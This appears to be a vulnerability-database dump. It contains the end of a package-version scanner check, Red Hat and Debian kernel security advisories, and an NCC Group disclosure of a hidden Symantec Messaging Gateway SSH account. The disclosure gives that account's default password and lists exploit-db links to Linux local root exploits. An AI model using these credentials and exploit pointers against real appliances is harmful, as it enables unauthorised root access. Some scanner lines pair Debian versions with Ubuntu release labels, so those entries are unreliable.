isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mips\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mipsel\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390-tape\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-s390\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-sparc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nsd\", ver:\"2.3.7-1.1+lenny1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nsd3\", ver:\"3.0.7-3.lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"racoon\", ver:\"0.7.1-1.3+lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ipsec-tools\", ver:\"0.7.1-1.3+lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-server\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-simple\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-refclock\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.4p4+dfsg-6ubuntu2.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.4p4+dfsg-6ubuntu2.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.4p4+dfsg-6ubuntu2.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.4p4+dfsg-7ubuntu5.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.4p4+dfsg-7ubuntu5.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.4p4+dfsg-7ubuntu5.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2021-10-19T20:37:30", "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues:\n\n* a logic error was found in the do_setlk() function of the Linux kernel\nNetwork File System (NFS) implementation. If a signal interrupted a lock\nrequest, the local POSIX lock was incorrectly created. This could cause a\ndenial of service on the NFS server if a file descriptor was closed before\nits corresponding lock request returned. (CVE-2008-4307, Important)\n\n* a deficiency was found in the Linux kernel system call auditing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to circumvent a system call audit configuration, if that configuration\nfiltered based on the \"syscall\" number or arguments.\n(CVE-2009-0834, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel secure-computing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to bypass intended access restrictions, if those access restriction\nfilters were based on the \"syscall\" number or arguments.\n(CVE-2009-0835, Important)\n\n* the exit_notify() function in the Linux kernel did not properly reset the\nexit signal if a process executed a set user ID (setuid) application before\nexiting. This could allow a local, unprivileged user to elevate their\nprivileges. (CVE-2009-1337, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel signals\nimplementation. The clone() system call permits the caller to indicate the\nsignal it wants to receive when its child exits. When clone() is called\nwith the CLONE_PARENT flag, it permits the caller to clone a new child that\nshares the same parent as itself, enabling the indicated signal to be sent\nto the caller's parent (instead of the caller), even if the caller's parent\nhas different real and effective user IDs. This could lead to a denial of\nservice of the parent. (CVE-2009-0028, Moderate)\n\n* an off-by-two error was found in the set_selection() function of the\nLinux kernel. This could allow a local, unprivileged user to cause a denial\nof service when making a selection of characters in a UTF-8 console. Note:\nphysical console access is required to exploit this issue.\n(CVE-2009-1046, Low)\n\nThese updated packages also fix the following bug:\n\n* the __scsi_device_lookup_by_target() function was always returning the\nfirst matching device, regardless of the state of the device. This meant\nthat any valid device listed after a deleted device would not be found. The\n__scsi_device_lookup_by_target() function was modified so that deleted\ndevices are skipped, and valid devices are now found. (BZ#495976)\n\nAll Red Hat Enterprise MRG users should install this update, which resolves\nthese issues. For this update to take effect, the system must be rebooted.", "cvss3": {}, "published": "2009-04-29T00:00:00", "type": "redhat", "title": "(RHSA-2009:0451) Important: kernel-rt security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4307", "CVE-2009-0028", "CVE-2009-0834", "CVE-2009-0835", "CVE-2009-1046", "CVE-2009-1337"], "modified": "2019-03-22T19:44:23", "id": "RHSA-2009:0451", "href": "https://access.redhat.com/errata/RHSA-2009:0451", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:32", "description": "Multiple DoS conditions, peivilege escalations, information leaks and memory corruptions.", "cvss3": {}, "published": "2009-05-04T00:00:00", "type": "securityvulns", "title": "Linux kernel multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1046", "CVE-2009-0859", "CVE-2009-1242", "CVE-2009-1192", "CVE-2009-0745", "CVE-2009-1338", "CVE-2009-1337", "CVE-2009-0834", "CVE-2009-1265", "CVE-2009-1439"], "modified": "2009-05-04T00:00:00", "id": "SECURITYVULNS:VULN:9889", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9889", "sourceData": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n=======\r\nSummary\r\n=======\r\nName: Symantec Messaging Gateway - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\nRelease Date: 30 November 2012\r\nReference: NGS00267\r\nDiscoverer: Ben Williams <ben.williams@ngssecure.com>\r\nVendor: Symantec\r\nVendor Reference: \r\nSystems Affected: Symantec Messaging Gateway 9.5.3-3\r\nRisk: High\r\nStatus: Published\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 18 April 2012\r\nReleased: 18 April 2012\r\nApproved: 29 April 2012\r\nReported: 30 April 2012\r\nFixed: 27 August 2012\r\nPublished: 30 November 2012\r\n\r\n===========\r\nDescription\r\n===========\r\nI. VULNERABILITY\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 is the latest version, of their Email Security Appliance\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nThe "admin" SSH account has a restricted shell, and the password is set by the administrator during setup.\r\n\r\nHowever, there is another SSH account "support" which has a default password, which is not changed during installation, and does not seem to be mentioned in the Symantec documentation as far as I can see (Installation Guide, Administration Guide or Command-line Guide). This account has a very easy-to-guess password, but many administrators may not know it exists.\r\n\r\nAdditionally, the Linux Kernel on the appliance has not been updated since late 2007 (almost 5 years) so suffers from multiple privilege escalation issues (as do other old packages on the operating system) so if SSH is accessible to an attacker, it is possible for them to login and escalate to root.\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nBoth the install wizard and the documentation prompt the administrator to change the password for the "admin" account, for both the UI and for SSH to the operating system. This admin account can SSH in to the appliance, with the new chosen password, and has a restricted shell environment where only certain application administration commands are possible. \r\n\r\nIt is not possible to login as root. However, there is another account "support" which has a default password of "symantec" which is not mentioned anywhere in the installer or documentation (as far as I can see) and the password is not changed as part of the installation process. This account is able to login to the OS via SSH, and does not have a restricted shell environment.\r\n\r\nAdditionally, the Linux Kernel is very old (2007) so suffers from multiple privilege escalation issues.\r\n\r\n[+] Results for kernel version 2.6.18-274.3.1.2.el5_sms\r\n\r\nPotential exploits:\r\n\r\n* Linux Kernel BCM Local Root Exploit\r\n CVE: CVE-2010-2959\r\n Affects kernels: 2.6.0-2.6.36rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/14814\r\n\r\n* Linux Kernel RDS protocol Local Root Exploit\r\n CVE: CVE-2010-3904\r\n Affects kernels: 2.6.0-2.6.36rc8\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15285\r\n\r\n* Linux Kernel econet_sendmsg() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3848 \r\n Affects kernels: 2.6.0-2.6.36.2 \r\n Exploits: \r\n http://www.exploit-db.com/exploits/17787 \r\n \r\n* Linux Kernel Unknown Local Root Exploit \r\n CVE: CVE-None \r\n Affects kernels: 2.6.18-2.6.20\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10613\r\n\r\n* Linux Kernel sock_sendpage() (Wunderbar Emporium) Local Root Exploit\r\n CVE: CVE-2009-2692\r\n Affects kernels: 2.6.0-2.6.31rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9641\r\n http://www.exploit-db.com/exploits/9545\r\n http://www.exploit-db.com/exploits/9479\r\n http://www.exploit-db.com/exploits/9436\r\n http://www.exploit-db.com/exploits/9435\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel pipe.c (MooseCox) Local Root Exploit\r\n CVE: CVE-2009-3547\r\n Affects kernels: 2.6.0-2.6.32rc5\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10018\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel ReiserFS xattr Local Root Exploit\r\n CVE: CVE-2010-1146\r\n Affects kernels: 2.6.0-2.6.34rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/12130\r\n\r\n* Linux Kernel vmsplice Local Root Exploit\r\n CVE: CVE-2008-0009\r\n Affects kernels: 2.6.17-2.6.24.1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/5092\r\n http://www.exploit-db.com/exploits/5093\r\n\r\n* Linux Kernel ec_dev_ioctl() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3850\r\n Affects kernels: 2.6.0-2.6.36.2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ACPI custom_method Local Root Exploit\r\n CVE: CVE-2010-4347\r\n Affects kernels: 2.6.0-2.6.37rc2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15774\r\n\r\n* Linux Kernel ftruncate()/open() Local Root Exploit\r\n CVE: CVE-2008-4210\r\n Affects kernels: 2.6.0-2.6.22\r\n Exploits:\r\n http://www.exploit-db.com/exploits/6851\r\n\r\n* Linux Kernel put_user() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-4258\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel sock_no_sendpage() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-3849\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ipc - half-nelson Local Root Exploit\r\n CVE: CVE-2010-4073\r\n Affects kernels: 2.6.0-2.6.37rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n\r\n* Linux Kernel SELinux/RHEL5 (Cheddar Bay) Local Root Exploit\r\n CVE: CVE-None\r\n Affects kernels: 2.6.9-2.6.30\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9208\r\n http://www.exploit-db.com/exploits/9191\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel exit_notify() Local Root Exploit\r\n CVE: CVE-2009-1337\r\n Affects kernels: 2.6.0-2.6.29\r\n Exploits:\r\n http://www.exploit-db.com/exploits/8369\r\n\r\n* Linux Kernel system call emulation Local Root Exploit\r\n CVE: CVE-2007-4573\r\n Affects kernels: 2.6.0-2.6.22.7\r\n Exploits:\r\n http://www.exploit-db.com/exploits/4460\r\n\r\n* Linux Kernel set_selection() UTF-8 Off By One Local Root Exploit\r\n CVE: CVE-2009-1046\r\n Affects kernels: 2.6.0-2.6.28.3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9083\r\n\r\n===============\r\nFix Information\r\n===============\r\n\r\nAn updated version of the software has been released to address the vulnerability:\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00\r\n\r\nNCC Group Research\r\nhttp://www.nccgroup.com/research\r\n\r\n\r\nFor more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>\r\nThis email message has been delivered safely and archived online by Mimecast.\r\n</a>\r\n", "cvss3": {}, "published": "2012-12-02T00:00:00", "type": "securityvulns", "title": "NGS000267 Technical Advisory: Symantec Messaging Gateway SSH with backdoor user account plus privilege escalation to root due to very old Kernel", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2007-4573", "CVE-2010-4073", "CVE-2009-2692", "CVE-2009-1046", "CVE-2010-2959", "CVE-2008-0009", "CVE-2010-1146", "CVE-2010-3850", "CVE-2010-4258", "CVE-2009-3547", "CVE-2010-3848", "CVE-2009-1337", "CVE-2010-4347", "CVE-2008-4210", "CVE-2010-3849"], "modified": "2012-12-02T00:00:00", "id": "SECURITYVULNS:DOC:28783", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28783", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ----------------------------------------------------------------------\r\nDebian Security Advisory DSA-1787-1 security@debian.org\r\nhttp://www.debian.org/security/ Dann Frazier\r\nMay 2, 2009 http://www.debian.org/security/faq\r\n- ----------------------------------------------------------------------\r\n\r\nPackage : linux-2.6.24\r\nVulnerability : denial of service/privilege escalation/information leak\r\nProblem type : local/remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-4307 CVE-2008-5079 CVE-2008-5395 CVE-2008-5700\r\n CVE-2008-5701 CVE-2008-5702 CVE-2009-0028 CVE-2009-0029\r\n CVE-2009-0031 CVE-2009-0065 CVE-2009-0269 CVE-2009-0322\r\n CVE-2009-0675 CVE-2009-0676 CVE-2009-0745 CVE-2009-0834\r\n CVE-2009-0859 CVE-2009-1046 CVE-2009-1192 CVE-2009-1242\r\n CVE-2009-1265 CVE-2009-1337 CVE-2009-1338 CVE-2009-1439\r\n\r\nSeveral vulnerabilities have been discovered in the Linux kernel that\r\nmay lead to a denial of service or privilege escalation. The Common\r\nVulnerabilities and Exposures project identifies the following\r\nproblems:\r\n\r\nCVE-2008-4307\r\n\r\n Bryn M. Reeves reported a denial of service in the NFS filesystem.\r\n Local users can trigger a kernel BUG() due to a race condition in\r\n the do_setlk function.\r\n\r\nCVE-2008-5079\r\n\r\n Hugo Dias reported a DoS condition in the ATM subsystem that can\r\n be triggered by a local user by calling the svc_listen function\r\n twice on the same socket and reading /proc/net/atm/*vc.\r\n\r\nCVE-2008-5395\r\n\r\n Helge Deller discovered a denial of service condition that allows\r\n local users on PA-RISC systems to crash a system by attempting to\r\n unwind a stack contiaining userspace addresses.\r\n\r\nCVE-2008-5700\r\n\r\n Alan Cox discovered a lack of minimum timeouts on SG_IO requests,\r\n which allows local users of systems using ATA to cause a denial of\r\n service by forcing drives into PIO mode.\r\n \r\nCVE-2008-5701\r\n\r\n Vlad Malov reported an issue on 64-bit MIPS systems where a local\r\n user could cause a system crash by crafing a malicious binary\r\n which makes o32 syscalls with a number less than 4000.\r\n\r\nCVE-2008-5702\r\n\r\n Zvonimir Rakamaric reported an off-by-one error in the ib700wdt\r\n watchdog driver which allows local users to cause a buffer\r\n underflow by making a specially crafted WDIOC_SETTIMEOUT ioctl\r\n call.\r\n\r\nCVE-2009-0028\r\n\r\n Chris Evans discovered a situation in which a child process can\r\n send an arbitrary signal to its parent.\r\n\r\nCVE-2009-0029\r\n\r\n Christian Borntraeger discovered an issue effecting the alpha,\r\n mips, powerpc, s390 and sparc64 architectures that allows local\r\n users to cause a denial of service or potentially gain elevated\r\n privileges.\r\n\r\nCVE-2009-0031\r\n\r\n Vegard Nossum discovered a memory leak in the keyctl subsystem\r\n that allows local users to cause a denial of service by consuming\r\n all of kernel memory.\r\n\r\nCVE-2009-0065\r\n\r\n Wei Yongjun discovered a memory overflow in the SCTP\r\n implementation that can be triggered by remote users, permitting\r\n remote code execution.\r\n \r\nCVE-2009-0269\r\n\r\n Duane Griffin provided a fix for an issue in the eCryptfs\r\n subsystem which allows local users to cause a denial of service\r\n (fault or memory corruption).\r\n\r\nCVE-2009-0322\r\n\r\n Pavel Roskin provided a fix for an issue in the dell_rbu driver\r\n that allows a local user to cause a denial of service (oops) by\r\n reading 0 byts from a sysfs entry.\r\n\r\nCVE-2009-0675\r\n\r\n Roel Kluin discovered inverted logic in the skfddi driver that\r\n permits local, unprivileged users to reset the driver statistics.\r\n\r\nCVE-2009-0676\r\n\r\n Clement LECIGNE discovered a bug in the sock_getsockopt function\r\n that may result in leaking sensitive kernel memory.\r\n\r\nCVE-2009-0745\r\n\r\n Peter Kerwien discovered an issue in the ext4 filesystem that\r\n allows local users to cause a denial of service (kernel oops)\r\n during a resize operation.\r\n\r\nCVE-2009-0834\r\n\r\n Roland McGrath discovered an issue on amd64 kernels that allows\r\n local users to circumvent system call audit configurations which\r\n filter based on the syscall numbers or argument details.\r\n\r\nCVE-2009-0859\r\n\r\n Jiri Olsa discovered that a local user can cause a denial of\r\n service (system hang) using a SHM_INFO shmctl call on kernels\r\n compiled with CONFIG_SHMEM disabled. This issue does not affect\r\n prebuilt Debian kernels.\r\n\r\nCVE-2009-1046\r\n\r\n Mikulas Patocka reported an issue in the console subsystem that\r\n allows a local user to cause memory corruption by selecting a\r\n small number of 3-byte UTF-8 characters.\r\n\r\nCVE-2009-1192\r\n\r\n Shaohua Li reported an issue in the AGP subsystem they may allow\r\n local users to read sensitive kernel memory due to a leak of\r\n uninitialized memory.\r\n\r\nCVE-2009-1242\r\n\r\n Benjamin Gilbert reported a local denial of service vulnerability\r\n in the KVM VMX implementation that allows local users to trigger\r\n an oops.\r\n\r\nCVE-2009-1265\r\n\r\n Thomas Pollet reported an overflow in the af_rose implementation\r\n that allows remote attackers to retrieve uninitialized kernel\r\n memory that may contain sensitive data.\r\n\r\nCVE-2009-1337\r\n\r\n Oleg Nesterov discovered an issue in the exit_notify function that\r\n allows local users to send an arbitrary signal to a process by\r\n running a program that modifies the exit_signal field and then\r\n uses an exec system call to launch a setuid application.\r\n\r\nCVE-2009-1338\r\n\r\n Daniel Hokka Zakrisson discovered that a kill(-1) is permitted to\r\n reach processes outside of the current process namespace.\r\n \r\nCVE-2009-1439\r\n\r\n Pavan Naregundi reported an issue in the CIFS filesystem code that\r\n allows remote users to overwrite memory via a long\r\n nativeFileSystem field in a Tree Connect response during mount.\r\n\r\nFor the stable distribution (etch), these problems have been fixed in\r\nversion 2.6.24-6~etchnhalf.8etch1.\r\n\r\nWe recommend that you upgrade your linux-2.6.24 packages.\r\n\r\nNote: Debian 'etch' includes linux kernel packages based upon both the\r\n2.6.18 and 2.6.24 linux releases. All known security issues are\r\ncarefully tracked against both packages and both packages will receive\r\nsecurity updates until security support for Debian 'etch'\r\nconcludes. However, given the high frequency at which low-severity\r\nsecurity issues are discovered in the kernel and the resource\r\nrequirements of doing an update, lower severity 2.6.18 and 2.6.24\r\nupdates will typically release in a staggered or "leap-frog" fashion.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch1.diff.gz\r\n Size/MD5 checksum: 4033829 ff5f9342fbd061dcab316080057bf9ac\r\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch1.dsc\r\n Size/MD5 checksum: 5117 c71acfa6a187429a702d368e5974d082\r\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz\r\n Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\r\n Size/MD5 checksum: 82422 f39c24b3acf13eee80ab07421e120bc7\r\n 